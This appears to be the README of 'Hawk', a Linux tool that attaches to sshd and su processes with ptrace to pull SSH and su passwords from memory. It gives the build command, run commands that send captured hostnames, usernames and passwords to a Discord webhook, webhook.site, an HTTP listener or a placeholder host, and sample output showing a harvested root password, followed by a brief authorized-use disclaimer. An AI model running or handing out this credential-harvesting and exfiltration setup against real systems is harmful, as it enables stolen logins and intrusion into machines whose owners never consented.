Silently intercept SSH and SU credentials in real-time
Hawk monitors sshd and su processes, extracting passwords from memory via ptrace without modifying target processes. Zero writes. Pure read-only credential harvesting.
Hawk leverages Linux's /proc filesystem to discover SSH and SU processes, then uses ptrace to attach and intercept syscalls. When password authentication occurs, it reads the password directly from process memory during the write() syscall—completely transparent to the target process. Credentials are exfiltrated via webhook or printed to stdout.
Deep dive: Blog Post
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawkHawk automatically detects Discord webhooks and sends formatted messages:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKENSetup: Create a webhook in your Discord server following Discord's webhook guide. Credentials will appear in your channel formatted with hostname, username, and password.
For other webhook services (webhook.site, custom servers, etc.):
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/pathNo webhook? Credentials print to stdout:
./hawkOutput:
hostname=server01 username=root password=SuperSecret123
- Linux system with ptrace enabled
/procfilesystem mounted- Root privileges (required for ptrace)
This tool is for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Use responsibly and only on systems you own or have explicit permission to test.

